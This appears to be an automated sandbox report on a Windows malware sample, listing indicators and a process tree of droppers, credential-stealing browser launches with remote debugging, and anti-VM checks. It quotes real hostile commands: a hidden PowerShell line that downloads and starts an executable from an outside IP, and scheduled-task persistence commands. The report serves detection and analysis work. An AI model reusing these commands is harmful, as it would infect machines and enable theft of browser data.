1028 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3716 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 3716 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 3716 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 1716 87a483eddc.exe 1716 87a483eddc.exe 1716 87a483eddc.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2664 firefox.exe 1184 HmngBpR.exe 8072 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3716 wrote to memory of 2972 3716 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 84 PID 3716 wrote to memory of 2972 3716 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 84 PID 3716 wrote to memory of 2972 3716 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 84 PID 3716 wrote to memory of 3996 3716 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 85 PID 3716 wrote to memory of 3996 3716 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 85 PID 3716 wrote to memory of 3996 3716 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 85 PID 2972 wrote to memory of 456 2972 cmd.exe 87 PID 2972 wrote to memory of 456 2972 cmd.exe 87 PID 2972 wrote to memory of 456 2972 cmd.exe 87 PID 3996 wrote to memory of 2668 3996 mshta.exe 88 PID 3996 wrote to memory of 2668 3996 mshta.exe 88 PID 3996 wrote to memory of 2668 3996 mshta.exe 88 PID 2668 wrote to memory of 4892 2668 powershell.exe 90 PID 2668 wrote to memory of 4892 2668 powershell.exe 90 PID 2668 wrote to memory of 4892 2668 powershell.exe 90 PID 4892 wrote to memory of 5580 4892 TempFHZKMSRXYYN80L0BWISIGAVV9VJPO26B.EXE 91 PID 4892 wrote to memory of 5580 4892 TempFHZKMSRXYYN80L0BWISIGAVV9VJPO26B.EXE 91 PID 4892 wrote to memory of 5580 4892 TempFHZKMSRXYYN80L0BWISIGAVV9VJPO26B.EXE 91 PID 5580 wrote to memory of 3096 5580 rapes.exe 94 PID 5580 wrote to memory of 3096 5580 rapes.exe 94 PID 5580 wrote to memory of 3096 5580 rapes.exe 94 PID 3096 wrote to memory of 1260 3096 amnew.exe 95 PID 3096 wrote to memory of 1260 3096 amnew.exe 95 PID 3096 wrote to memory of 1260 3096 amnew.exe 95 PID 5580 wrote to memory of 3900 5580 rapes.exe 96 PID 5580 wrote to memory of 3900 5580 rapes.exe 96 PID 5580 wrote to memory of 3900 5580 rapes.exe 96 PID 5580 wrote to memory of 5604 5580 rapes.exe 97 PID 5580 wrote to memory of 5604 5580 rapes.exe 97 PID 5580 wrote to memory of 5604 5580 rapes.exe 97 PID 5580 wrote to memory of 1716 5580 rapes.exe 100 PID 5580 wrote to memory of 1716 5580 rapes.exe 100 PID 5580 wrote to memory of 1716 5580 rapes.exe 100 PID 1716 wrote to memory of 3972 1716 87a483eddc.exe 101 PID 1716 wrote to memory of 3972 1716 87a483eddc.exe 101 PID 1716 wrote to memory of 3972 1716 87a483eddc.exe 101 PID 1716 wrote to memory of 3120 1716 87a483eddc.exe 102 PID 1716 wrote to memory of 3120 1716 87a483eddc.exe 102 PID 1716 wrote to memory of 3120 1716 87a483eddc.exe 102 PID 3972 wrote to memory of 4408 3972 cmd.exe 104 PID 3972 wrote to memory of 4408 3972 cmd.exe 104 PID 3972 wrote to memory of 4408 3972 cmd.exe 104 PID 3120 wrote to memory of 1484 3120 mshta.exe 105 PID 3120 wrote to memory of 1484 3120 mshta.exe 105 PID 3120 wrote to memory of 1484 3120 mshta.exe 105 PID 5580 wrote to memory of 5200 5580 rapes.exe 107 PID 5580 wrote to memory of 5200 5580 rapes.exe 107 PID 5580 wrote to memory of 5200 5580 rapes.exe 107 PID 5200 wrote to memory of 5872 5200 cmd.exe 109 PID 5200 wrote to memory of 5872 5200 cmd.exe 109 PID 5200 wrote to memory of 5872 5200 cmd.exe 109 PID 5200 wrote to memory of 5572 5200 cmd.exe 110 PID 5200 wrote to memory of 5572 5200 cmd.exe 110 PID 5200 wrote to memory of 5572 5200 cmd.exe 110 PID 5572 wrote to memory of 5428 5572 cmd.exe 111 PID 5572 wrote to memory of 5428 5572 cmd.exe 111 PID 5572 wrote to memory of 5428 5572 cmd.exe 111 PID 5200 wrote to memory of 3936 5200 cmd.exe 112 PID 5200 wrote to memory of 3936 5200 cmd.exe 112 PID 5200 wrote to memory of 3936 5200 cmd.exe 112 PID 3936 wrote to memory of 2136 3936 cmd.exe 113 PID 3936 wrote to memory of 2136 3936 cmd.exe 113 PID 3936 wrote to memory of 2136 3936 cmd.exe 113 PID 5200 wrote to memory of 2848 5200 cmd.exe 114 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe"C:\Users\Admin\AppData\Local\Temp\d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn ZSOwVma1E5J /tr "mshta C:\Users\Admin\AppData\Local\Temp\tBCtp8wmM.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn ZSOwVma1E5J /tr "mshta C:\Users\Admin\AppData\Local\Temp\tBCtp8wmM.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:456
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\tBCtp8wmM.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'FHZKMSRXYYN80L0BWISIGAVV9VJPO26B.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Users\Admin\AppData\Local\TempFHZKMSRXYYN80L0BWISIGAVV9VJPO26B.EXE"C:\Users\Admin\AppData\Local\TempFHZKMSRXYYN80L0BWISIGAVV9VJPO26B.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5580 -
C:\Users\Admin\AppData\Local\Temp\10234920101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10234920101\amnew.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"7⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
PID:1260 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"8⤵
- Executes dropped EXE
PID:4656 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5076
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3712 -
C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 8369⤵
- Program crash
PID:4004
-
-
-
C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"8⤵
- Executes dropped EXE
PID:5504 -
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /SC MINUTE /MO 5 /TN "XblGameSave\XblGameSvTask" /TR "C:\Users\Admin\AppData\Roaming\HexRays\frameapphost.exe" /F /RL HIGHEST9⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:348
-
-
-
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2796 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- Downloads MZ/PE file
- Checks processor information in registry
PID:4580 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
PID:4904 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffa3665dcf8,0x7ffa3665dd04,0x7ffa3665dd1011⤵PID:3552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1572,i,156654541081631353,1609282761981681277,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2156 /prefetch:311⤵PID:6008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2076,i,156654541081631353,1609282761981681277,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2064 /prefetch:211⤵PID:5808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2396,i,156654541081631353,1609282761981681277,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2320 /prefetch:811⤵PID:3432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3184,i,156654541081631353,1609282761981681277,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3180 /prefetch:111⤵
- Uses browser remote debugging
PID:4052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,156654541081631353,1609282761981681277,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3244 /prefetch:111⤵
- Uses browser remote debugging
PID:3176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4488,i,156654541081631353,1609282761981681277,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4536 /prefetch:111⤵
- Uses browser remote debugging
PID:8
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5152,i,156654541081631353,1609282761981681277,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5164 /prefetch:811⤵PID:1940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5200,i,156654541081631353,1609282761981681277,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5216 /prefetch:811⤵PID:1052
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4560 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x288,0x7ffa27f3f208,0x7ffa27f3f214,0x7ffa27f3f22011⤵PID:4784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1848,i,4979473709089050140,6450940413808758986,262144 --variations-seed-version --mojo-platform-channel-handle=2548 /prefetch:311⤵PID:3048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1788,i,4979473709089050140,6450940413808758986,262144 --variations-seed-version --mojo-platform-channel-handle=2600 /prefetch:811⤵PID:3180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2512,i,4979473709089050140,6450940413808758986,262144 --variations-seed-version --mojo-platform-channel-handle=2508 /prefetch:211⤵PID:1516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3544,i,4979473709089050140,6450940413808758986,262144 --variations-seed-version --mojo-platform-channel-handle=3612 /prefetch:111⤵
- Uses browser remote debugging
PID:5160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3552,i,4979473709089050140,6450940413808758986,262144 --variations-seed-version --mojo-platform-channel-handle=3620 /prefetch:111⤵
- Uses browser remote debugging
PID:4760
-
-
-
C:\ProgramData\jeknyus2no.exe"C:\ProgramData\jeknyus2no.exe"10⤵
- Executes dropped EXE
PID:4148 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"11⤵PID:2812
-
-
-
C:\ProgramData\pp8q9rimy5.exe"C:\ProgramData\pp8q9rimy5.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4060 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"11⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:1152 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""12⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:11008 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffa1b00dcf8,0x7ffa1b00dd04,0x7ffa1b00dd1013⤵PID:11036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1876,i,9705264218490665687,4017072218760385278,262144 --variations-seed-version --mojo-platform-channel-handle=2416 /prefetch:313⤵PID:11048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2400,i,9705264218490665687,4017072218760385278,262144 --variations-seed-version --mojo-platform-channel-handle=2380 /prefetch:213⤵PID:1136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=1924,i,9705264218490665687,4017072218760385278,262144 --variations-seed-version --mojo-platform-channel-handle=2768 /prefetch:813⤵PID:9188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3240,i,9705264218490665687,4017072218760385278,262144 --variations-seed-version --mojo-platform-channel-handle=3304 /prefetch:113⤵
- Uses browser remote debugging
PID:4512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3248,i,9705264218490665687,4017072218760385278,262144 --variations-seed-version --mojo-platform-channel-handle=3324 /prefetch:113⤵
- Uses browser remote debugging
PID:4884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4464,i,9705264218490665687,4017072218760385278,262144 --variations-seed-version --mojo-platform-channel-handle=4428 /prefetch:113⤵
- Uses browser remote debugging
PID:11532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4992,i,9705264218490665687,4017072218760385278,262144 --variations-seed-version --mojo-platform-channel-handle=5004 /prefetch:813⤵PID:11716
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""12⤵
- Uses browser remote debugging
PID:11888 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch13⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:11900 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x260,0x264,0x268,0x25c,0x288,0x7ffa1ad1f208,0x7ffa1ad1f214,0x7ffa1ad1f22014⤵PID:11928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1856,i,12318143785397149118,3244573814012688,262144 --variations-seed-version --mojo-platform-channel-handle=2616 /prefetch:314⤵PID:12204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2556,i,12318143785397149118,3244573814012688,262144 --variations-seed-version --mojo-platform-channel-handle=2588 /prefetch:214⤵PID:12208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1908,i,12318143785397149118,3244573814012688,262144 --variations-seed-version --mojo-platform-channel-handle=2636 /prefetch:814⤵PID:12220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3428,i,12318143785397149118,3244573814012688,262144 --variations-seed-version --mojo-platform-channel-handle=3380 /prefetch:114⤵
- Uses browser remote debugging
PID:12404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3436,i,12318143785397149118,3244573814012688,262144 --variations-seed-version --mojo-platform-channel-handle=3472 /prefetch:114⤵
- Uses browser remote debugging
PID:12408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4652,i,12318143785397149118,3244573814012688,262144 --variations-seed-version --mojo-platform-channel-handle=5128 /prefetch:814⤵PID:13264
-
-
